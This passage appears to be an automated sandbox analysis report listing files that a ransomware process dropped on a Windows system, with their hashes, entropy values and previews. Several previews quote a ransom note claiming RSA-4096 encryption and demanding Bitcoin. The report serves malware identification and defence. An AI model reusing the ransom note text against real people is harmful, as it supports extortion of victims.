                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\UEV\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\UEV\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\User Account Pictures\guest.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5776
                  Entropy (8bit):7.947189807063984
                  Encrypted:false
                  SSDEEP:96:IToELP9EH8SUyTQgLI4kU9FljZdjaH/X9LTwq3ARNu6e1a2hqiEDY84fTSOHy0W:h+SHzq8k6j/afX9fNQRNubsNi91fhY
                  MD5:A70111E6F3F970AE8131A9F0DB71E9C8
                  SHA1:AD269AC98CF83D5305617EBC8D74B589F08BDCD1
                  SHA-256:C908BB84703F0D2971684B1B6F1B55DBDFD10056DED5E120AB3E9B67F88D34D7
                  SHA-512:D849B77444B49D7067133E2EBB0FD30E1B986225FE1820A91815A96AA37AD49DF5F15E2CB9E92C6DFABCB3B39191358D8706D39973857B1A0DA40EF7B58D2785
                  Malicious:false
                  Preview: .........2C.%'b3...........kU....V............^RJtgVz.3.;~......g....o.....Bm.@..\s5.i...`..N.K<...3.z._.....Y\....?..................................+......I..g#'..N.#.....W.A.a9...../.|......y..E4.k..M........b$...uM..K.._A....E..)...i."._.....$......5+...pjO.2...5.q474.*2......N*..T(p[7.}..ko......@................................e..1.i&.............c...3Y...'-.@....@..RMR.6..4...J...o'...aq....<.5..+..tCA.:....B5.~.T}..4....fN..N.'.....y.Z,...U.*.sD...#.s.b..5......~%.;.......y.(.9....L.f.=.;w.u`.m..Yj*...z7...$J#.I?y...$k..<..su._...4....3.2.....;....".AU..c\....@.wc..p........r^..h.GjA...w......`.Uj.|.X.E;.~..z.K....m..L.....M....Wo..6S....;_......>a&.jP..K../.X..zT)....&.E7P..r.Ci....zU......=6V.b.I ..djhUle..^...*I...u..^Jh.......I....Q..>..O.d.aX#.".. #...v...-...Q.....{..Q.i.5...h.....i.:..^P........W~.....P.o..'..d..nT.`<;.R.C..4."R....@....a(..g......:..N6...z.)...<#):....c`.A@..#..I.M.Xo.....I.S>....,......Wu..5.#...wz....{."I.g...1...
                  C:\ProgramData\Microsoft\User Account Pictures\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\User Account Pictures\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\User Account Pictures\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\User Account Pictures\user-192.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2784
                  Entropy (8bit):7.876414826205081
                  Encrypted:false
                  SSDEEP:48:IToge9YNF4YvlU3WLtSlE91EZisQOf2NQHgJdFtIOeRXK1yd:IToX3YqWLtEc1EQ9OfeQHotIOsXK1yd
                  MD5:2926D8FDD1AEBC5D019ACCBC1F259AA4
                  SHA1:58BEEA1DCE565B69D914817D63567F166D4D2A64
                  SHA-256:70EEDDF227BA60BBBD243734E151C85EE79D9B6A8845047C6262F717AAF185AC
                  SHA-512:F067455D14A8ACBCD9967C8B7E9948D2D1277C163009B2C11AAA4B8BF20D397EAA6A373720CCFE982BD4EDBB532E16D06205ADBE950C0FFD9A1D8B4D25DE0429
                  Malicious:false
                  Preview: .........2C.%'b3...........kU....V............^RJtgVz.3.;~......g....o.....Bm.@..\s5.i...`..N.K<...3.z._.....Y\....?..................................+......I..g#'..N.#.....W.A.a9...../.|......y..E4.k..M........b$...uM..K.._A....E..)...i."._.....$......5+...pjO.2...5.q474.*2......N*..T(p[7.}..ko......@................................e..1.i&........g....c...3Y...'-.@....=p.2te.Z.0Z..Ae...[_..-G......r$.hf....p.a.Z.......L..r..W1..............O1...`....e>".......B.l7..]...V#......C_...%.[.....\Nj.R0..+.H0..a{.p....A..f6r......\...[DV..MB....O....!..+.h.R.Y...........W.......M"../..Mj...~Y.....<z....<.N...1.v}.Q.....$1..E.J._.8j_.-.....> %.B..........G#..5....(....)Z.;8.q:.`Y".=...Q.....JS..\.29.MgI.wl..;.a.....PY>..au;..rLW.[%.9..... ..l.....9O.......`x..wN.#..T..#.{......N.u...T.S.r.#..n.`.|O.m."+dA.D..Fv..W&l))E...._7"Ox...>...UZ7...s..-5z.........|.b..........^c._.........\.fAt\N.gTOt.D..c}.."R..).fDM....wg...`z....E.Gc.......~..E.[....y.iz.
                  C:\ProgramData\Microsoft\User Account Pictures\user-32.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):784
                  Entropy (8bit):7.344137297701923
                  Encrypted:false
                  SSDEEP:12:xXSFdZpDdwWOF33m9/YDKU0eN4VOLBehfxEZypcVH4gT/5nAyDbyNrWIH/59xJN:IZFqvx3mS5N4aBeVdYTT/euONTHxj
                  MD5:2083E6B9C915256B237AF7C95E394506
                  SHA1:64C8E93CEC255887A521C03059137CA3D4DFE5DD
                  SHA-256:F9BDF11433C9DF407851AD8D4018EE52EDF88A783BFE8488E252C49A9A5E6CC8
                  SHA-512:D2BCC1572D464435CAD1D3C5A39B7942E97333A9C7704F1D7938A1C7F3A45272460FE0C514CCEFE35898EACCDA8E9D9A50E38A85C04D84D4E29EA5ED1926F085
                  Malicious:false
                  Preview: .........2C.%'b3...........kU....V............^RJtgVz.3.;~......g....o.....Bm.@..\s5.i...`..N.K<...3.z._.....Y\....?..................................+......I..g#'..N.#.....W.A.a9...../.|......y..E4.k..M........b$...uM..K.._A....E..)...i."._.....$......5+...pjO.2...5.q474.*2......N*..T(p[7.}..ko......@................................e..1.i&.............c...3Y...'-.@..e.\...>S.-...I.;2..r.k6..P..j...g..n..j...=x...I......J.[...`x\.IK...a,.g[..N........kg5........:.1{...<..%L.9.%#.B..h.".<q._<.^".zU..c...G..8..{fq....v.$.......5.|..:.........s...'...#k..^.T.......}...........\...A.W.....`..8T.. L+s`............0I.F.u.j.W.....T....W.....JS. ..2.1.....-...c....d_.~..A.G.<..K......yO../...He.....9%..b"......D....|w...6$.B. 7?@.......[.q.t..8D.
                  C:\ProgramData\Microsoft\User Account Pictures\user-40.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):816
                  Entropy (8bit):7.381735020777451
                  Encrypted:false
                  SSDEEP:12:xXSFdZpDdwWOF33m9/YDKU0eTYo+Uz5M5NJ03xcwBiVrhni6vH+FuctastF9+MSE:IZFqvx3mS5TYo+fNJS6rNZiuXstmg/lJ
                  MD5:BAFEBB2C5F6AF4AD7534B357A975143F
                  SHA1:C74BA51A8E9D8609F017A713D9B39D027062F997
                  SHA-256:5DD174900EA2DB698067C20F8031A87968173BBEEB9B9F96773F4F2F55D7040C
                  SHA-512:2EDE22AFFF27B95FFC2B5F99DB4084C3859522ABD8827D5290622EAA66DBE7DC0F3F95F3F9F3E3BB55BAB0D34EDF95974C143D998CFF9C53600468963B529D60
                  Malicious:false
                  Preview: .........2C.%'b3...........kU....V............^RJtgVz.3.;~......g....o.....Bm.@..\s5.i...`..N.K<...3.z._.....Y\....?..................................+......I..g#'..N.#.....W.A.a9...../.|......y..E4.k..M........b$...uM..K.._A....E..)...i."._.....$......5+...pjO.2...5.q474.*2......N*..T(p[7.}..ko......@................................e..1.i&.............c...3Y...'-.@.El5.EO.]........oJj....c....cM ....s..7;G.1tz.%8..e.11....4.1.\6..\Hf.._ad.j.~.a.........n^.xA((.T..n........e..0..".d+Z.1F..jU&g.C.!...*V.N.P.x.p..kb<MG3Y.P+...;%f.1....c.b;....R......bE..........x...:y.\..[..4.R..it.......a.....j.F.%.3U..7..(....W.'..M~h"...;.w.La%...7R.HU|B...[uy.U..;tL.T.r.....].*.2..4.^...$..b..._..vq.....9.s...|....2..X.z#...z(d..v..S............/y......haF....0....Vz/]Q...G.......{
                  C:\ProgramData\Microsoft\User Account Pictures\user-48.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):880
                  Entropy (8bit):7.403990204408736
                  Encrypted:false
                  SSDEEP:24:IZFqvx3mS5nXe1a8AAtQEIzWI0AAZUgYE:ITogenEa8HtIWrLZUgYE
                  MD5:EB6BAC0963407C20EF2CD84029CA2DEA
                  SHA1:6D2D5DA1A85551B4B1720163468A56833CA66C96
                  SHA-256:14D7B10D439B44D7B3298AA4FFBF1D45767233F82B3CEABE87AE85FC594CBD64
                  SHA-512:DE58308BA32A7AD970790592D7694A827F5D61E2DAD3BFF7D6B785A45DDA4946F9204D01E8344D97B40842B07756BA6A2AC73773D3970EE85767896F3E816C22
                  Malicious:false
                  Preview: .........2C.%'b3...........kU....V............^RJtgVz.3.;~......g....o.....Bm.@..\s5.i...`..N.K<...3.z._.....Y\....?..................................+......I..g#'..N.#.....W.A.a9...../.|......y..E4.k..M........b$...uM..K.._A....E..)...i."._.....$......5+...pjO.2...5.q474.*2......N*..T(p[7.}..ko......@................................e..1.i&.............c...3Y...'-.@....(v...D<.k%."..1.F.~B.aV..#.K.1W..{...N};j.. ....6.~..iv.F$..GH...%.H.u.d......: bh.O..XYY,Q.i.....M|......^.e...I^..;.he.a2. ...o1|.R.J$...I..ld.T..{.G.......v..S..`p.)=..P.L.....8..e..1.....e..w.d........6f;.)...{..{.FT.Cc!.Ke...iq@oO...D.r......##.....).d.......fi....lV.d.?...i.Op..>...r1.u6.go......v.0.}qG..-..-Y.S3r{:R.v.D..f...}....1..Si..J]..B.....AOt &...L~L..../..\..J{..E.......4.$.^....S#.n.V..m..;-..#P...h}8f/.....f4.l...#...........Vp....."..>..S9..C.7K
                  C:\ProgramData\Microsoft\User Account Pictures\user.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5776
                  Entropy (8bit):7.947189807063984
                  Encrypted:false
                  SSDEEP:96:IToELP9EH8SUyTQgLI4kU9FljZdjaH/X9LTwq3ARNu6e1a2hqiEDY84fTSOHy0W:h+SHzq8k6j/afX9fNQRNubsNi91fhY
                  MD5:A70111E6F3F970AE8131A9F0DB71E9C8
                  SHA1:AD269AC98CF83D5305617EBC8D74B589F08BDCD1
                  SHA-256:C908BB84703F0D2971684B1B6F1B55DBDFD10056DED5E120AB3E9B67F88D34D7
                  SHA-512:D849B77444B49D7067133E2EBB0FD30E1B986225FE1820A91815A96AA37AD49DF5F15E2CB9E92C6DFABCB3B39191358D8706D39973857B1A0DA40EF7B58D2785
                  Malicious:false
                  Preview: .........2C.%'b3...........kU....V............^RJtgVz.3.;~......g....o.....Bm.@..\s5.i...`..N.K<...3.z._.....Y\....?..................................+......I..g#'..N.#.....W.A.a9...../.|......y..E4.k..M........b$...uM..K.._A....E..)...i."._.....$......5+...pjO.2...5.q474.*2......N*..T(p[7.}..ko......@................................e..1.i&.............c...3Y...'-.@....@..RMR.6..4...J...o'...aq....<.5..+..tCA.:....B5.~.T}..4....fN..N.'.....y.Z,...U.*.sD...#.s.b..5......~%.;.......y.(.9....L.f.=.;w.u`.m..Yj*...z7...$J#.I?y...$k..<..su._...4....3.2.....;....".AU..c\....@.wc..p........r^..h.GjA...w......`.Uj.|.X.E;.~..z.K....m..L.....M....Wo..6S....;_......>a&.jP..K../.X..zT)....&.E7P..r.Ci....zU......=6V.b.I ..djhUle..^...*I...u..^Jh.......I....Q..>..O.d.aX#.".. #...v...-...Q.....{..Q.i.5...h.....i.:..^P........W~.....P.o..'..d..nT.`<;.R.C..4."R....@....a(..g......:..N6...z.)...<#):....c`.A@..#..I.M.Xo.....I.S>....,......Wu..5.#...wz....{."I.g...1...
                  C:\ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Vault\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Vault\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Vault\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
